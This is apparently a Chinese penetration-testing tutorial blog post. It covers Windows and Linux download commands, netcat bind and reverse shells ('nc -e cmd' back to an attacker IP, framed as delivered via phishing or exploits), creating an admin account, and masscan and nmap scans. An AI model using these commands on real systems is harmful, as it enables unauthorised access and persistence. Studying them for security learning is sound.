渗透测试流程-中篇

#作者:允砸儿

#日期:乙巳青蛇年  四月廿一(2025年5月18日)

今天笔者带大家继续学习,网安的知识比较杂且知识面很广,这一部分会介绍很多需要使用的工具。会用各种工具是做网安的基础,ok咱们继续一起深入了解。

笔者先回顾一下关于Windows命令和Linux命令:

Windows命令回顾

基础命令:chdir(cd)、dir、whoami、ipconfig

#查看用户

net user

#创建用户

net user troyber/add

#设置密码

net user troyber 123456

#设置成管理员

net localgroup administrators troyber/add

#激活

net user troyber/active

#删除

net user troyber/delete

权限:

1、直接点击鼠标右键属性里面的安全编辑完全控制

2、Windows提权

文件下载:

把命令放到黑窗口里面

这是命令:(注意保存在那里  Windows+system32)

powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:80/ppp.php -OutFile abc.php "

certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe

bitsadmin /rawreturn /transfer down"http://127.0.0.1:8080/ms10-051.exe" c:\\exploit.exe

Linux命令回顾

基础命令:pwd、id、ls

权限:Linux提权

ll-a

*  r (读权限):表示有读取文件或目录内容的权限

*  w(写权限):表示有写入文件或目录内容的权限

*  x(执行权限):表示有执行文件或目录的权限

*  -(无权限):表示没有相应的权限

chmod u
          g  +(加入)  r
          o  -(除去)w
          a  =(设定)  x    文件或目录

文件下载:

wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe

curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe

接下来笔者介绍一些工具#主要是帮助我们收集各种情报的

nc  (网猫)瑞士军刀

概念

NetCat简称‘nc’,有着网络安全界‘瑞士军刀的美称’,可以通过TCP/UDP协议读写,是一个好用稳定的连接系统后门的工具,同时也是一个网络调试和开发工具。

参数

-l :开启监听

-p :指定端口

-t :以talent形式应答

-e :程序重定向

-n :以数字的形式显示IP

-v :显示执行命令过程

-z :不进行交互,直接显示结果

-u :使用udp协议传输

-w :设置超时时间

-d :后台运行

基础使用

笔者带大家做一个案例:简单聊天

1、在安装好nc的文件夹里的路径中输入cmd#注意要在nc.exe的文件夹里面输入

2、打开两次黑窗口一个作为服务端一个作为客户端

3、在服务端输入:D:\install\netcat\netcat-win32-1.12>nc.exe -lp 5566

    在客户端输入:D:\install\netcat\netcat-win32-1.12>nc.exe 127.0.0.1 5566

我可以在服务端输入hello客户端也可以接收到hello

正向返回shell

前面的进黑窗口的步骤笔者省略了直接进行操作

1、在服务端:nc.exe -lp 5566 -e cmd.exe 

  在客户端:nc.exe 127.0.0.1 5566

#服务端我把cmd的权限给你了,在客户端我得到了权限后,我第一次退出的是服务端,第二次退出的才是客户端(本体)

反弹shell

在这里面笔者开一个2012的虚拟机进行操作,笔者会分为主机和虚拟机(Windows系统)进行操作#注意虚拟机里面也要有nc

我们通过正向shell的时候会被防火墙进行拦截(#注意做测试的时候需要关闭防火墙),所以我们使目标机主动向外发起连接这样就会绕过防火墙建立通道。

主机启动监听窗口:nc.exe -lvp 5566

2012目标(通过漏洞利用、钓鱼攻击、恶意脚本等方式,让目标机器执行一条反向连接命令)

nc.exe -e cmd 192.168.111.1 5566

目标机器主动连接到攻击者的监听端口,攻击者获得目标机器的Shell控制权。

Linux系统

主机启动监听窗口:nc -lvp 5566

目标机:nc -e /bin/bash 192.168.0.56 5566

文件传输

1、客户端传服务端

#服务端:nc -lp 5566 >outfile.txt

#客户端:nc.exe 127.0.0.1 5566<a.txt

2、服务端传客户端

#客户端:nc.exe 127.0.0.1 5566 >a.txt

#服务端:nc -lp 5566 <outfile.txt

* >大于就相当于+  (输入),<小于就相当于-(输出),语句相反(端口随便搞)

信息探测(情报)

1、端口扫描(kali执行)

nc -n -v -w1 -z 192.168.1.187 1-1000(w1一定要慢超时时间)

2、打印banner

echo " " |nc -n -v -w1 192.168.1.187 1-1000(html的一个界面,什么报错信息都在banner里显示)

masscan

概述

kali里面内置的工具,性能比nmap要高,可以先使用masscan对目标IP(通常是一个网段)进行全端口扫描,然后再使用nmap对存活主机的开放端口进行扫描,找出对应端口的服务存在的漏洞,使用
masscan对目标IP进行扫描的原因就是因为其速度快于nmap。

参数

基本扫描参数

-p :指定扫描的端口范围

-P :设置目标主机的端口范围

-iL :从文件中读取目标IP地址

扫描速度和性能

--rate :设置扫描速度(数据包/秒)

--max-rate :设置最大扫描速度

--min-rate :设置最小扫描速度

--randomize-hosts :随机扫描目标主机

输出格式

-oL :以普通文本格式输出结果

-oJ :以JSON格式输出结果

-oG :以Drepable格式输出结果

网络探测

--ping :ping扫描,检测存活主机

--banners :获取主机服务的横幅信息

基础设置

--adapter :选择网络适配器

--router-mac:获取主机服务的横幅信息

实例

#扫描指定端口范围和IP范围

sudo masscan -p 80-90 --range 8.220.40.5-8.220.40.255

#检查指定范围的主机是否存活

sudo masscan --ping --range 8.220.40.5-8.220.40.255

#扫描所有端口,设置速率为任何值

masscan -p 1-65535 8.220.40.5 --rate 100

#从文件中读取IP列表,输出为JSON格式

masscan -iL targets.txt -oJ output.json

nmap

概述

功能强劲的扫描工具,kali里面自带,支持端口扫描、主机探测、服务识别、系统识别

参数

端口扫描

-p 80 :扫80端口

-p 1-80 :扫1-80端口

-p 80,3389,22,21 :扫指定端口

主机探测

nmap -sP 8.220.40.5 

服务识别

nmap -sV 8.220.40.5  -p 80 nmap -sV 8.220.40.5

系统识别 

sudo nmap -O 8.220.40.5 -p 8080

结果导出

sudo nmap -O 8.220.40.5 -oN re.txt

总结:笔者这是简单写一下这些工具,要深入可以在网上搜素一下语句。需要多加练习熟悉了就记住怎么操作了。后面我会写一下搜集情报的思路,情报学很重要。

人生每一个阶段都能悟出不同的道理,人的自信重要,主动出击也重要。有句俗语说的好,临渊羡鱼,不如退而结网。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/81545.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[创业之路-358]:从历史轮回到制度跃迁:中国共产党创业模式的超越性密码

人类文明的演进如同一条螺旋上升的阶梯&#xff0c;从原始社会的公有制到资本主义私有制的巅峰&#xff0c;再到社会主义对公有制的重构&#xff0c;每一次制度迭代都伴随着对前序文明的扬弃。中国共产党自诞生之日起&#xff0c;便以“为人类求解放”为使命&#xff0c;在革命…

NLP基础

目录 一、NLP 概述和应用 &#xff08;一&#xff09;NLP 的定义与演进历程 &#xff08;二&#xff09;NLP 的多元应用领域 二、文本预处理技术 &#xff08;一&#xff09;文本获取与编码转换 &#xff08;二&#xff09;文本清洗&#xff1a;去除杂质的精细打磨 &…

【数据结构与算法】ArrayList 与顺序表的实现

目录 一、List 接口 1.1 List 接口的简单介绍 1.1 常用方法 二、顺序表 2.1 线性表的介绍 2.2 顺序表的介绍 2.3 顺序表的实现 2.3.1 前置条件:自定义异常 2.3.2 顺序表的初始化 2.3.2 顺序表的实现 三、ArrayList 实现类 3.1 ArrayList 的两种使用方式 3.2 Array…

Linux518 YUM源仓库回顾(需查)ssh 服务配置回顾 特定任务配置回顾

计划配仓库YUM源 为什么我在/soft文件夹下 使用yum install --downloadonly --downloaddir /soft samba 为什么文件夹下看不到samba文件 exiting because “Download Only” specified 计划过 计划配SSH 参考 ok了 计划配置特定任务解决方案 code: 两端先配好网络 测试好s…

如何完美安装GPU版本的torch、torchvision----解决torch安装慢 无法安装 需要翻墙安装 安装的是GPU版本但无法使用的GPU的错误

声明&#xff1a; 本视频灵感来自b站 如何解决所述问题 如何安装对应版本的torch、torchvison 进入pytorch官网 进入历史版本 这里以cuda11.8 torch 2.1.0为例演示 根据文档找到要安装的torch、torchvison版本 但不是使用命令行直接安装 命令行直接安装可能面临着 安装慢…

【iOS(swift)笔记-9】WKWebView无法访问网络

对于iOS 在info中添加App Transport Security Settings&#xff0c;然后在App Transport Security Settings里添加Allow Arbitrary Loadstrue 对于macOS 除了上面的操作&#xff0c;还需在项目信息的App Sandbox里有个Network打钩选项

buck变换器的simulink/matlab仿真和python参数设计

什么是Buck电路? BUCK电路是一种降压斩波器&#xff0c;降压变换器输出电压平均值Uo总是小于输出电压UD。通常电感中的电流是否连续&#xff0c;取决于开关频率、滤波电感L和电容C的数值。BUCK也是DC-DC基本拓扑&#xff0c;或者称为电路结构&#xff0c;是最基本的DC-DC电路…

给个人程序加上MCP翅膀

背景 最近MCP这个词真是到处都是&#xff0c;看起来特别高大上。我平时没事的时候也一直在关注这方面的技术&#xff0c;知道它是怎么一回事&#xff0c;也懂该怎么去实现。但可惜一直抽不出时间来自己动手搞一个MCP服务。网上关于MCP的教程一搜一大把&#xff0c;但基本上都是…

AWS中国区CloudFront证书管理和应用指南

在AWS中国区使用CloudFront时,SSL/TLS证书的管理和应用是一个重要的环节。本文将详细介绍如何在AWS中国区上传、管理和应用SSL证书到CloudFront分配。 1. 准备证书文件 首先,我们需要准备好SSL证书相关的文件。通常,这包括: 私钥文件(.key)公钥证书文件(.crt)证书链文…

为什么hadoop不用Java的序列化?

Java的序列化是一个重量级序列化框架&#xff08;Serializable&#xff09;&#xff0c;一个对象被序列化后&#xff0c;会附带很多额外的信息&#xff08;各种校验信息&#xff0c;Header&#xff0c;继承体系等&#xff09;&#xff0c;不便于在网络中高效传输。所以&#xf…

Word压缩解决方案

Word压缩解决方案&#xff1a;基于图片压缩的 .docx 优化实践 &#x1f4cc; 背景 在日常科研写作或项目文档整理中&#xff0c;Word 文档&#xff08;.docx&#xff09;往往因为插入大量高清图表、扫描图像、公式图等导致文件体积过大&#xff0c;或者毕业学位论文查重要求上…

基于基金净值百分位的交易策略

策略来源&#xff1a;睿思量化小程序 基金净值百分位&#xff0c;是衡量当前基金净值在过去一段时间内的相对位置。以近一年为例&#xff0c;若某基金净值百分位为30%&#xff0c;意味着过去一年中有30%的时间基金净值低于当前值&#xff0c;70%的时间高于当前值。这一指标犹如…

数字人技术的核心:AI与动作捕捉的双引擎驱动(210)

**摘要&#xff1a;**数字人技术从静态建模迈向动态交互&#xff0c;AI与动作捕捉技术的深度融合推动其智能化发展。尽管面临表情僵硬、动作脱节、交互机械等技术瓶颈&#xff0c;但通过多模态融合技术、轻量化动捕方案等创新&#xff0c;数字人正逐步实现自然交互与情感表达。…

基于OpenCV的实时文档扫描与矫正技术

文章目录 引言一、系统概述二、核心代码解析1. 导入必要库2. 辅助函数定义3. 坐标点排序函数4. 透视变换函数5. 主程序流程 三、完整代码四、结语 引言 在日常工作和学习中&#xff0c;我们经常需要将纸质文档数字化。手动拍摄文档照片常常会出现角度倾斜、透视变形等问题&…

jenkins pipeline实现CI/CD

在企业级的架构中&#xff0c;CI/CD是必不可少的一个环节&#xff0c;它可以让开发人员只关注于开发&#xff0c;而不必去关注项目的构建和部署&#xff0c;从而提高开发人员的效率。 本文我们来介绍一下使用jenkins 的pipeline来进行java项目的自动构建以及部署。我们通过脚本…

InfluxDB 3 Core + Java 11 + Spring Boot:打造高效物联网数据平台

一、 引言&#xff1a;为什么选择InfluxDB 3&#xff1f; 项目背景&#xff1a; 在我们的隧道风机监控系统中&#xff0c;实时数据的采集、存储和高效查询是至关重要的核心需求。风机运行产生的振动、倾角、电流、温度等参数是典型的时序数据&#xff0c;具有高并发写入、数据…

泰国SAP ERP实施如何应对挑战?工博科技赋能中企出海EEC战略

泰国正依托"东部经济走廊&#xff08;EEC&#xff09;"与RCEP协定叠加优势&#xff0c;为中国企业提供面向亚太市场的战略机遇。作为2022年泰国主要外资来源国之一&#xff0c;中国企业通过电子制造、智能家电、数据中心及新能源车等领域的投资深度参与泰国"4.0…

【设计模式】- 创建者模式

单例模型 饿汉式 静态方法创建对象 public class Singleton {// 私有构造方法private Singleton(){}private static Singleton instance new Singleton();// 提供一个外界获取的方法public static Singleton getInstance(){return instance;} }静态代码块创建对象 public …

逻辑与非逻辑的弥聚

非逻辑弥聚与逻辑弥聚是复杂系统中两种不同的信息整合方式。逻辑弥聚侧重于通过明确的规则、规律和结构化方法&#xff0c;将分散的信息或功能进行有序的组织和集中处理&#xff0c;强调理性和确定性。而非逻辑弥聚则更多地涉及情感、直觉、经验等非线性、非结构化的因素&#…

Linux进程信号(三)之信号产生2

文章目录 4. 由软件条件产生信号5. 硬件异常产生信号模拟一下除0错误和野指针异常除0错误野指针错误 总结思考一下 4. 由软件条件产生信号 SIGPIPE是一种由软件条件产生的信号,在“管道”中已经介绍过了。 软件条件不就绪&#xff0c;很明显这个软件条件没有直接报错&#xff…